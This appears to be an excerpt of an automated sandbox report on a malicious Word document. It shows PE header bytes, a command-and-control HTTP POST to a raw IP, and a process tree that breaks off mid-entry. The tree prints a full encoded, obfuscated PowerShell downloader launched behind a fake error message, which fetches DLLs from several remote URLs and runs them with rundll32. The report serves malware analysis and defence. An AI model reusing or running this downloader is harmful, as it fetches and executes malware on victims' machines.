00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$:wTwTwTwTwTwT-wT-wTwUSwT-wTwTwTwTwwTwTRichwTPEL_!JE0P 8@.text `.rdataJL@@.data- @.rsrc P@@.relocH@B


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      1192.168.2.22491685.2.136.9080C:\Windows\SysWOW64\rundll32.exe
                                      TimestampkBytes transferredDirectionData
                                      Jan 6, 2021 08:49:32.588160992 CET200OUTPOST /76cxdz6xxj/u15u3hf6xq6us/0vtcgy/tltp48/51u1dif1fy5wlgpgf/ HTTP/1.1
                                      DNT: 0
                                      Referer: 5.2.136.90/76cxdz6xxj/u15u3hf6xq6us/0vtcgy/tltp48/51u1dif1fy5wlgpgf/
                                      Content-Type: multipart/form-data; boundary=--------------sArhAY1ugWdoQV
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                      Host: 5.2.136.90
                                      Content-Length: 5940
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache
                                      Jan 6, 2021 08:49:33.304199934 CET208INHTTP/1.1 200 OK
                                      Server: nginx
                                      Date: Wed, 06 Jan 2021 07:49:33 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Vary: Accept-Encoding
                                      Data Raw: 66 38 34 0d 0a 53 97 06 1b 16 33 39 9f c1 09 dd 4d cb a3 a4 db a9 1c 20 be 0c 9c 93 80 84 b3 8b 03 85 93 79 0e d0 96 17 ea e5 76 f1 b0 d4 3d 3b 72 42 22 68 03 8f 2f bd 76 75 31 b6 49 8f 43 f1 4a ee 61 7c e9 06 44 61 c2 a6 47 d7 39 bf 32 e7 08 35 c9 57 38 c3 0f 3c 9d 55 af af 54 ff c4 1d 40 01 e7 8c 38 e4 86 50 5e 04 3e 63 8e b6 66 29 e6 fd 66 e7 f1 bb fb b7 77 1a 0c 15 49 0e 3f 5d 14 f5 6c f4 c8 cd dc fb 3a bc ef 74 4f d2 c8 62 61 36 5c d4 15 3a a0 b1 ba 52 1b 50 1b 92 6f df b5 31 ac d5 a5 69 2a 16 0b 13 ff 98 d7 b7 aa 3a 6f 9c a5 5b 15 76 57 6a c4 06 d1 16 2f 44 34 ff 7d 55 d1 29 41 a3 f3 a2 4f c9 b3 2d 92 e1 fd 32 bb 13 52 e6 44 b5 69 15 8d 53 4c f9 1e 54 57 bd 93 a8 19 ea a5 f1 14 8a 4d e6 1e 7a 48 dd e2 53 47 20 34 c0 6d f6 2d 18 e3 e9 e5 fe 28 a8 24 51 e3 da 42 0d c7 bb dc 5c 6c 05 70 ff f2 8f 41 c6 c6 b3 b6 9d ef aa 75 89 69 1d 75 62 b7 d9 b0 14 cd 5c 19 7c 7a c1 de 9b da 53 45 12 77 0c c9 cb 16 74 9e 3f 4c 62 21 56 72 fc 8c f9 e1 ab f4 d0 46 9f d6 2e c8 f5 c0 c8 79 64 75 1e 11 1a 62 cf a1 31 4f 1e 74 78 72 a2 eb 3b 2b 86 73 0d 80 1b f9 6a 69 06 7d e3 10 d4 67 15 5c 92 a5 5d 1b 22 fe cf 5b 91 1f 04 33 70 cb 64 43 a3 a8 5f 32 ae fa fd 0d fc b4 10 bb 7e 7d 3e 97 55 55 cf c5 8d 2d 87 18 aa 99 ab 2d 07 2c 5c 07 8e 38 60 9f b0 99 e6 37 3e 74 ef ef 24 9b 0d fd 59 a6 f0 40 cc 06 8f 62 f1 75 03 70 10 98 41 32 ae f5 e7 26 4f ed 0c f3 3e a2 f8 e6 49 1c 52 41 1e 0f 62 08 8e 65 73 15 8d e0 e8 67 b5 10 a7 8d 18 67 d1 32 bd 3b a0 63 41 2c 02 1c 38 9b 97 03 2e 22 d6 05 c1 18 76 cd 69 bf b9 b9 43 f3 51 63 c7 58 7b 5f 46 d3 9a c9 9e 3b 62 1a be 49 7e 8f 0c 90 f9 44 2b 34 f8 7d 4a 23 2e 5b 3a 82 ea 02 5e 19 da 90 ab 46 56 01 82 0f 87 61 0a 5e b5 9f 22 ef b5 91 e7 4e 0d 95 1c 5d 50 a8 31 e2 8b 4b 0b 64 cd d2 73 48 d3 fd db d7 fc 6a e4 3e dc ff 2e 9b eb a1 14 1b c7 90 8b 94 4c 1c d6 64 ab c9 72 8e d4 f4 68 4b d7 6c 5a f4 d3 97 33 ca a5 e4 2d d2 77 eb 9f 3d 81 68 79 9a 7c 1e 16 5b b5 4e 1d 26 36 67 eb f7 de 24 c5 8c 26 95 06 b2 5a 26 e6 2b 4e 93 a3 1a 3b b6 b0 be b1 82 08 d5 c9 c1 b6 59 56 c1 44 5d d3 bd 0d 76 06 58 14 dc 22 e8 c7 3e 71 5f c3 1e d3 5b 27 56 ba 9c ce 40 cc 36 87 18 69 b3 a3 0c 5a dc 0f 3c 22 3c d6 d8 58 c9 bc d2 95 23 85 71 e7 1a 42 2b c0 d9 af 3c dc 4b c8 50 54 e7 19 05 e5 f0 ab 52 18 e7 93 18 f2 ec eb f2 54 70 e2 89 ac bd 95 2b 41 e0 93 c7 92 da db 4e e9 bf a9 6d 78 99 b0 c3 96 99 60 19 d3 0f 20 4f 3f d8 c2 35 15 9a fe 60 7b ab 5e 4d b8 94 62 9a bb b4 27 da 91 ff 1d 37 a9 61 7e d2 13 93 50 bc 9c 6f 17 3d 6d b4 06 26 11 cc 09 5a 39 07 76 49 4b 23 fd 78 22 a8 78 1f a1 d1 32 c4 78 be ec 41 16 19 95 34 da f5 5c 38 3c 5c 3a 78 36 24 ed b0 a7 ef 19 2b 33 db 68 82 db 22 e1 45 22 1d 6f 7b fd a9 d5 6a 99 e5 0a 0e df 4e 39 6a 64 c8 52 a7 20 44 a6 e1 92 90 18 a9 18 f5 2c b2 75 85 3e f2 29 af 4a f3 48 d3 aa f9 df 3e fc c0 7e 7a 1d 04 9c f9 b6 5a 4c 86 7b c2 1e 29 7e 2a 3c 67 4c f2 57 97 6e af ae fa 4b 56 a2 13 96 68 0e e6 03 f6 c1 63 75 a7 f1 f9 6f 30 85 06 07 57 d0 95 3e 95 f0 f7 37 cf 13 cc bf e1 df 6b b5 ed e9 85 c7 43 64 9c 33 46 db f1 81 12 b9 89 6f 2b e5 92 28 74 07 cf 8b 22 c8 e1 65 f3 ef 76 6c 71 31 a3 d8 69 11 b0 48 9d 37 d9 bd 4b d8 3a 21 59 1c 7b 05 6c 4a 1f c4 f4 05 1a 3d 7d e0 a3 08 88 a2 55 0b 9b 55 08 b0 fc 02 18 b0 c5 eb 53 93 7e 6e fa 0e e9 08 25 ae 1a 67 98 6a 75 9f 83 79 3f 7f 7e 62 c7 6b ee f0 6b 3a 39 3b bb 21 fc 91 c3 d5 6b a8 a6 58 f3 ce 4b 98 a1 03 8f 47 a0 1a 65 92 2f dd 3f 59 f3 30 6a 40 a9 be e5 29 b7 e0 11 a7 15 fb 99 71 33 2d 93 ff fd 36 f1 08 ed 60 5a 16 c1 87 d5 5b 96 64
                                      Data Ascii: f84S39M yv=;rB"h/vu1ICJa|DaG925W8<UT@8P^>cf)fwI?]l:tOba6\:RPo1i*:o[vWj/D4}U)AO-2RDiSLTWMzHSG 4m-($QB\lpAuiub\|zSEwt?Lb!VrF.ydub1Otxr;+sji}g\]"[3pdC_2~}>UU--,\8`7>t$Y@bupA2&O>IRAbesgg2;cA,8."viCQcX{_F;bI~D+4}J#.[:^FVa^"N]P1KdsHj>.LdrhKlZ3-w=hy|[N&6g$&Z&+N;YVD]vX">q_['V@6iZ<"<X#qB+<KPTRTp+ANmx` O?5`{^Mb'7a~Po=m&Z9vIK#x"x2xA4\8<\:x6$+3h"E"o{jN9jdR D,u>)JH>~zZL{)~*<gLWnKVhcuo0W>7kCd3Fo+(t"evlq1iH7K:!Y{lJ=}UUS~n%gjuy?~bkk:9;!kXKGe/?Y0j@)q3-6`Z[d


                                      Code Manipulations

                                      Statistics

                                      Behavior

                                      Click to jump to process

                                      System Behavior

                                      General

                                      Start time:08:48:38
                                      Start date:06/01/2021
                                      Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                      Wow64 process (32bit):false
                                      Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                      Imagebase:0x13f920000
                                      File size:1424032 bytes
                                      MD5 hash:95C38D04597050285A18F66039EDB456
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      General

                                      Start time:08:48:40
                                      Start date:06/01/2021
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBTAFkAUwBUAGUAJwAsACcAQwBUAE8AUgB5ACcALAAnAE0AJwAsACcAUgBFACcALAAnAC4AaQBvAC4AZABJACcAKQAgACAAOwAgACAAcwBFAFQALQBJAHQARQBtACAAIAAoACcAVgAnACsAJwBhAHIAaQBBAEIATABlACcAKwAnADoARgBJAFUAJwApACAAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAwAH0AewA2AH0AewA1AH0AewAzAH0AewAyAH0AIgAgAC0AZgAnAE0ALgBuAEUAVAAuAFMAZQBSACcALAAnAHMAWQBzAHQAJwAsACcAVABNAGEATgBBAEcAZQByACcALAAnAE4AJwAsACcARQAnACwAJwBJACcALAAnAHYASQBjAEUAUABvACcAKQApADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlACcAKwAnAG4AJwApACsAKAAnAHQAJwArACcAbAB5AEMAJwApACsAKAAnAG8AJwArACcAbgB0ACcAKQArACgAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABIAGMANgBjADYAdQB5AD0AJABJADcANgBDACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABUADMANgBTADsAJABWADAANgBCAD0AKAAnAEkAMwAnACsAJwA5AEgAJwApADsAIAAgACgAZwBjAEkAIAAoACIAVgBBACIAKwAiAHIAaQBBAEIAIgArACIAbAAiACsAIgBFADoAOQA1ACIAKwAiAFgAdQBDAGQAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAUgBlAGEAVABgAEUAZABgAEkAUgBgAEUAYABDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBDADMAcgBlACcAKwAnADUAYwAzAHsAMAB9ACcAKwAnAEQAaQAnACsAJwBfAHAAJwArACcAMwAnACsAJwBjADkAJwArACcAewAwAH0AJwApAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAEQAMQA1AEIAPQAoACgAJwBHADIAJwArACcAOAAnACkAKwAnAE8AJwApADsAIAAkAGYAaQB1ADoAOgAiAHMAZQBgAGMAYABVAHIASQBUAFkAcABSAG8AVABPAGAAYwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFIAMwAyAEYAPQAoACcARwAnACsAKAAnADEANgAnACsAJwBaACcAKQApADsAJABDADcAegBpADkAdQB1ACAAPQAgACgAJwBPACcAKwAoACcAXwAnACsAJwA1AFoAJwApACkAOwAkAFcAXwAxAEQAPQAoACcARQAnACsAKAAnADEAOQAnACsAJwBUACcAKQApADsAJABXADcAaQBvADAAdwBnAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACgAJwBDACcAKwAnADMAcgBlADUAJwApACsAJwBjADMAJwArACcAewAnACsAJwAwAH0ARABpAF8AcAAzAGMAJwArACcAOQB7ACcAKwAnADAAfQAnACkALQBGAFsAQwBoAGEAcgBdADkAMgApACsAJABDADcAegBpADkAdQB1ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABIADMANgBBAD0AKAAnAFIAJwArACgAJwA2AF8AJwArACcATwAnACkAKQA7ACQARwByADYAeABfAGgAXwA9ACgAKAAnAF0AYQAnACsAJwBuAHcAWwAzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBwACcAKwAnAGUAdABhAGYAJwApACsAKAAnAGkAbABtACcAKwAnAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGEAJwArACcAZABtACcAKwAnAGkAbgAnACsAJwAvADQAbQAvAEAAXQAnACkAKwAnAGEAJwArACgAJwBuACcAKwAnAHcAWwAzACcAKwAnADoALwAvAGcAaQAnACsAJwB2AGkAJwApACsAKAAnAG4AZwAnACsAJwB0AGgAYQAnACsAJwBuAGsAcwBkACcAKQArACcAYQBpACcAKwAnAGwAJwArACgAJwB5AC4AYwAnACsAJwBvAG0ALwBxAGwARQAvAFYAZQBGAC8AJwArACcAQABdAGEAJwArACcAbgAnACkAKwAoACcAdwAnACsAJwBbADMAOgAvAC8AdwAnACkAKwAoACcAYQBwACcAKwAnAC4AJwApACsAJwB6AGgAJwArACgAJwBvAG4AZwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAHMAYwAnACsAJwAuAGMAJwArACcAbwAnACsAJwBtAC8AdwBwAC0AaQBuAGMAJwApACsAKAAnAGwAdQAnACsAJwBkAGUAcwAnACsAJwAvAFEAcgAnACsAJwB5AEMAJwApACsAJwBCAC8AJwArACcAQAAnACsAKAAnAF0AJwArACcAYQBuAHcAJwApACsAKAAnAFsAMwAnACsAJwBzADoALwAnACsAJwAvAGYAJwArACcAbgAnACsAJwBqAGIAcQAuAGMAbwBtAC8AdwBwAC0AaQAnACkAKwAoACcAbgBjACcAKwAnAGwAdQBkAGUAJwArACcAcwAvACcAKQArACgAJwByACcAKwAnAGwAUgAvAEAAJwArACcAXQBhAG4AdwBbACcAKwAnADMAcwAnACsAJwA6AC8ALwBzAGEAawAnACkAKwAoACcAaAAnACsAJwBpAHMAdQBoACcAKwAnAGEAbgAnACkAKwAnAGkAJwArACgAJwBuACcAKwAnAGEAcgBpAGoAZQAnACkAKwAoACcAZQB2AGkAawAnACsAJwBhAC4AJwApACsAKAAnAGMAJwArACcAbwBtAC8AJwApACsAJwB3ACcAKwAoACcAcAAnACsAJwAtAGkAJwApACsAKAAnAG4AYwAnACsAJwBsAHUAZAAnACkAKwAoACcAZQBzACcAKwAnAC8AQwB2AEcAJwApACsAKAAnAFUAJwArACcAagB2AEUALwBAAF0AJwArACcAYQBuAHcAWwAzADoAJwArACcALwAnACkAKwAoACcALwAnACsAJwB6ACcAKwAnAGkAZQBmAGwAaQB4ACcAKQArACgAJwAuACcAKwAnAHQAZQBsAGUAJwArACcAcwBrACcAKwAnAG8AJwArACcAcABzAHQAbwByAGUALgBjAG8AJwArACcAbQAnACkAKwAnAC8AYwAnACsAJwBnAGkAJwArACgAJwAtACcAKwAnAGIAaQBuACcAKQArACgAJwAvAEcAJwArACcAdAAzAFMALwBAACcAKQArACcAXQAnACsAJwBhAG4AJwArACgAJwB3AFsAJwArACcAMwAnACkAKwAnAHMAOgAnACsAKAAnAC8ALwBzAG8AbQBhAG4AYQBwAC4AYwBvACcAKwAnAG0ALwB3AHAAJwArACcALQBhAGQAJwArACcAbQAnACkAKwAoACcAaQBuACcAKwAnAC8AJwApACsAJwBQAC8AJwApAC4AIgByAGUAUABMAGAAQQBjAEUAIgAoACgAKAAnAF0AYQAnACsAJwBuAHcAJwApACsAJwBbACcAKwAnADMAJwApACwAKABbAGEAcgByAGEAeQBdACgAJwBzAGQAJwAsACcAcwB3ACcAKQAsACgAKAAnAGgAdAAnACsAJwB0ACcAKQArACcAcAAnACkALAAnADMAZAAnACkAWwAxAF0AKQAuACIAcwBgAHAAbABpAFQAIgAoACQAUQA5ADMASAAgACsAIAAkAEgAYwA2AGMANgB1AHkAIAArACAAJABIADgAOQBaACkAOwAkAEUANwA1AFYAPQAoACgAJwBJACcAKwAnADEANwAnACkAKwAnAFgAJwApADsAZgBvAHIAZQBhAGMAaAAgACgAJABDAGoAawBlADAAbABlACAAaQBuACAAJABHAHIANgB4AF8AaABfACkAewB0AHIAeQB7ACgALgAoACcATgBlAHcAJwArACcALQBPAGIAagBlAGMAJwArACcAdAAnACkAIABzAHkAUwB0AGUAbQAuAE4AZQB0AC4AVwBFAGIAYwBMAEkARQBuAHQAKQAuACIAZABvAHcAYABOAGwATwBgAEEAYABEAGYASQBsAGUAIgAoACQAQwBqAGsAZQAwAGwAZQAsACAAJABXADcAaQBvADAAdwBnACkAOwAkAFIANQA1AFMAPQAoACcAQgAnACsAKAAnADYANgAnACsAJwBTACcAKQApADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0ASQB0AGUAbQAnACkAIAAkAFcANwBpAG8AMAB3AGcAKQAuACIAbABgAEUAbgBHAGAAVABoACIAIAAtAGcAZQAgADQAMwAxADIANgApACAAewAmACgAJwByAHUAbgAnACsAJwBkACcAKwAnAGwAbAAzADIAJwApACAAJABXADcAaQBvADAAdwBnACwAKAAoACcAQwBvAG4AJwArACcAdAByAG8AJwApACsAKAAnAGwAJwArACcAXwBSAHUAJwApACsAJwBuAEQAJwArACcATABMACcAKQAuACIAdABgAE8AcwBgAFQAUgBJAG4AZwAiACgAKQA7ACQAWgAwADAAUAA9ACgAKAAnAFIAOQAnACsAJwA0ACcAKQArACcASgAnACkAOwBiAHIAZQBhAGsAOwAkAEcAOQAyAEkAPQAoACcAVQA4ACcAKwAnADkAWQAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFoAMQA3AE0APQAoACcASwA3ACcAKwAnADkAVQAnACkA
                                      Imagebase:0x49ee0000
                                      File size:345088 bytes
                                      MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate

                                      General

                                      Start time:08:48:40
                                      Start date:06/01/2021
                                      Path:C:\Windows\System32\msg.exe
                                      Wow64 process (32bit):false
                                      Commandline:msg user /v Word experienced an error trying to open the file.
                                      Imagebase:0xff630000
                                      File size:26112 bytes
                                      MD5 hash:2214979661E779C3E3C33D4F14E6F3AC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate

                                      General

                                      Start time:08:48:41
                                      Start date:06/01/2021
                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):false
                                      Commandline:POwersheLL -w hidden -ENCOD JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBTAFkAUwBUAGUAJwAsACcAQwBUAE8AUgB5ACcALAAnAE0AJwAsACcAUgBFACcALAAnAC4AaQBvAC4AZABJACcAKQAgACAAOwAgACAAcwBFAFQALQBJAHQARQBtACAAIAAoACcAVgAnACsAJwBhAHIAaQBBAEIATABlACcAKwAnADoARgBJAFUAJwApACAAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAwAH0AewA2AH0AewA1AH0AewAzAH0AewAyAH0AIgAgAC0AZgAnAE0ALgBuAEUAVAAuAFMAZQBSACcALAAnAHMAWQBzAHQAJwAsACcAVABNAGEATgBBAEcAZQByACcALAAnAE4AJwAsACcARQAnACwAJwBJACcALAAnAHYASQBjAEUAUABvACcAKQApADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlACcAKwAnAG4AJwApACsAKAAnAHQAJwArACcAbAB5AEMAJwApACsAKAAnAG8AJwArACcAbgB0ACcAKQArACgAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABIAGMANgBjADYAdQB5AD0AJABJADcANgBDACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABUADMANgBTADsAJABWADAANgBCAD0AKAAnAEkAMwAnACsAJwA5AEgAJwApADsAIAAgACgAZwBjAEkAIAAoACIAVgBBACIAKwAiAHIAaQBBAEIAIgArACIAbAAiACsAIgBFADoAOQA1ACIAKwAiAFgAdQBDAGQAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAUgBlAGEAVABgAEUAZABgAEkAUgBgAEUAYABDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBDADMAcgBlACcAKwAnADUAYwAzAHsAMAB9ACcAKwAnAEQAaQAnACsAJwBfAHAAJwArACcAMwAnACsAJwBjADkAJwArACcAewAwAH0AJwApAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAEQAMQA1AEIAPQAoACgAJwBHADIAJwArACcAOAAnACkAKwAnAE8AJwApADsAIAAkAGYAaQB1ADoAOgAiAHMAZQBgAGMAYABVAHIASQBUAFkAcABSAG8AVABPAGAAYwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFIAMwAyAEYAPQAoACcARwAnACsAKAAnADEANgAnACsAJwBaACcAKQApADsAJABDADcAegBpADkAdQB1ACAAPQAgACgAJwBPACcAKwAoACcAXwAnACsAJwA1AFoAJwApACkAOwAkAFcAXwAxAEQAPQAoACcARQAnACsAKAAnADEAOQAnACsAJwBUACcAKQApADsAJABXADcAaQBvADAAdwBnAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACgAJwBDACcAKwAnADMAcgBlADUAJwApACsAJwBjADMAJwArACcAewAnACsAJwAwAH0ARABpAF8AcAAzAGMAJwArACcAOQB7ACcAKwAnADAAfQAnACkALQBGAFsAQwBoAGEAcgBdADkAMgApACsAJABDADcAegBpADkAdQB1ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABIADMANgBBAD0AKAAnAFIAJwArACgAJwA2AF8AJwArACcATwAnACkAKQA7ACQARwByADYAeABfAGgAXwA9ACgAKAAnAF0AYQAnACsAJwBuAHcAWwAzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBwACcAKwAnAGUAdABhAGYAJwApACsAKAAnAGkAbABtACcAKwAnAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGEAJwArACcAZABtACcAKwAnAGkAbgAnACsAJwAvADQAbQAvAEAAXQAnACkAKwAnAGEAJwArACgAJwBuACcAKwAnAHcAWwAzACcAKwAnADoALwAvAGcAaQAnACsAJwB2AGkAJwApACsAKAAnAG4AZwAnACsAJwB0AGgAYQAnACsAJwBuAGsAcwBkACcAKQArACcAYQBpACcAKwAnAGwAJwArACgAJwB5AC4AYwAnACsAJwBvAG0ALwBxAGwARQAvAFYAZQBGAC8AJwArACcAQABdAGEAJwArACcAbgAnACkAKwAoACcAdwAnACsAJwBbADMAOgAvAC8AdwAnACkAKwAoACcAYQBwACcAKwAnAC4AJwApACsAJwB6AGgAJwArACgAJwBvAG4AZwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAHMAYwAnACsAJwAuAGMAJwArACcAbwAnACsAJwBtAC8AdwBwAC0AaQBuAGMAJwApACsAKAAnAGwAdQAnACsAJwBkAGUAcwAnACsAJwAvAFEAcgAnACsAJwB5AEMAJwApACsAJwBCAC8AJwArACcAQAAnACsAKAAnAF0AJwArACcAYQBuAHcAJwApACsAKAAnAFsAMwAnACsAJwBzADoALwAnACsAJwAvAGYAJwArACcAbgAnACsAJwBqAGIAcQAuAGMAbwBtAC8AdwBwAC0AaQAnACkAKwAoACcAbgBjACcAKwAnAGwAdQBkAGUAJwArACcAcwAvACcAKQArACgAJwByACcAKwAnAGwAUgAvAEAAJwArACcAXQBhAG4AdwBbACcAKwAnADMAcwAnACsAJwA6AC8ALwBzAGEAawAnACkAKwAoACcAaAAnACsAJwBpAHMAdQBoACcAKwAnAGEAbgAnACkAKwAnAGkAJwArACgAJwBuACcAKwAnAGEAcgBpAGoAZQAnACkAKwAoACcAZQB2AGkAawAnACsAJwBhAC4AJwApACsAKAAnAGMAJwArACcAbwBtAC8AJwApACsAJwB3ACcAKwAoACcAcAAnACsAJwAtAGkAJwApACsAKAAnAG4AYwAnACsAJwBsAHUAZAAnACkAKwAoACcAZQBzACcAKwAnAC8AQwB2AEcAJwApACsAKAAnAFUAJwArACcAagB2AEUALwBAAF0AJwArACcAYQBuAHcAWwAzADoAJwArACcALwAnACkAKwAoACcALwAnACsAJwB6ACcAKwAnAGkAZQBmAGwAaQB4ACcAKQArACgAJwAuACcAKwAnAHQAZQBsAGUAJwArACcAcwBrACcAKwAnAG8AJwArACcAcABzAHQAbwByAGUALgBjAG8AJwArACcAbQAnACkAKwAnAC8AYwAnACsAJwBnAGkAJwArACgAJwAtACcAKwAnAGIAaQBuACcAKQArACgAJwAvAEcAJwArACcAdAAzAFMALwBAACcAKQArACcAXQAnACsAJwBhAG4AJwArACgAJwB3AFsAJwArACcAMwAnACkAKwAnAHMAOgAnACsAKAAnAC8ALwBzAG8AbQBhAG4AYQBwAC4AYwBvACcAKwAnAG0ALwB3AHAAJwArACcALQBhAGQAJwArACcAbQAnACkAKwAoACcAaQBuACcAKwAnAC8AJwApACsAJwBQAC8AJwApAC4AIgByAGUAUABMAGAAQQBjAEUAIgAoACgAKAAnAF0AYQAnACsAJwBuAHcAJwApACsAJwBbACcAKwAnADMAJwApACwAKABbAGEAcgByAGEAeQBdACgAJwBzAGQAJwAsACcAcwB3ACcAKQAsACgAKAAnAGgAdAAnACsAJwB0ACcAKQArACcAcAAnACkALAAnADMAZAAnACkAWwAxAF0AKQAuACIAcwBgAHAAbABpAFQAIgAoACQAUQA5ADMASAAgACsAIAAkAEgAYwA2AGMANgB1AHkAIAArACAAJABIADgAOQBaACkAOwAkAEUANwA1AFYAPQAoACgAJwBJACcAKwAnADEANwAnACkAKwAnAFgAJwApADsAZgBvAHIAZQBhAGMAaAAgACgAJABDAGoAawBlADAAbABlACAAaQBuACAAJABHAHIANgB4AF8AaABfACkAewB0AHIAeQB7ACgALgAoACcATgBlAHcAJwArACcALQBPAGIAagBlAGMAJwArACcAdAAnACkAIABzAHkAUwB0AGUAbQAuAE4AZQB0AC4AVwBFAGIAYwBMAEkARQBuAHQAKQAuACIAZABvAHcAYABOAGwATwBgAEEAYABEAGYASQBsAGUAIgAoACQAQwBqAGsAZQAwAGwAZQAsACAAJABXADcAaQBvADAAdwBnACkAOwAkAFIANQA1AFMAPQAoACcAQgAnACsAKAAnADYANgAnACsAJwBTACcAKQApADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0ASQB0AGUAbQAnACkAIAAkAFcANwBpAG8AMAB3AGcAKQAuACIAbABgAEUAbgBHAGAAVABoACIAIAAtAGcAZQAgADQAMwAxADIANgApACAAewAmACgAJwByAHUAbgAnACsAJwBkACcAKwAnAGwAbAAzADIAJwApACAAJABXADcAaQBvADAAdwBnACwAKAAoACcAQwBvAG4AJwArACcAdAByAG8AJwApACsAKAAnAGwAJwArACcAXwBSAHUAJwApACsAJwBuAEQAJwArACcATABMACcAKQAuACIAdABgAE8AcwBgAFQAUgBJAG4AZwAiACgAKQA7ACQAWgAwADAAUAA9ACgAKAAnAFIAOQAnACsAJwA0ACcAKQArACcASgAnACkAOwBiAHIAZQBhAGsAOwAkAEcAOQAyAEkAPQAoACcAVQA4ACcAKwAnADkAWQAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFoAMQA3AE0APQAoACcASwA3ACcAKwAnADkAVQAnACkA
                                      Imagebase:0x13f590000
                                      File size:473600 bytes
                                      MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:.Net C# or VB.NET
                                      Yara matches:
                                      • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.2096095535.0000000000296000.00000004.00000001.sdmp, Author: Florian Roth
                                      • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.2096289799.0000000001BD6000.00000004.00000001.sdmp, Author: Florian Roth
                                      Reputation:high

                                      General

                                      Start time:08:48:44
                                      Start date:06/01/2021
                                      Path:C:\Windows\System32\rundll32.exe
                                      Wow64 process (32bit):false
                                      Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL
                                      Imagebase:0xff2c0000
                                      File size:45568 bytes
                                      MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate

                                      General

                                      Start time:08:48:45
                                      Start date:06/01/2021
                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                      Wow64 process (32bit):true
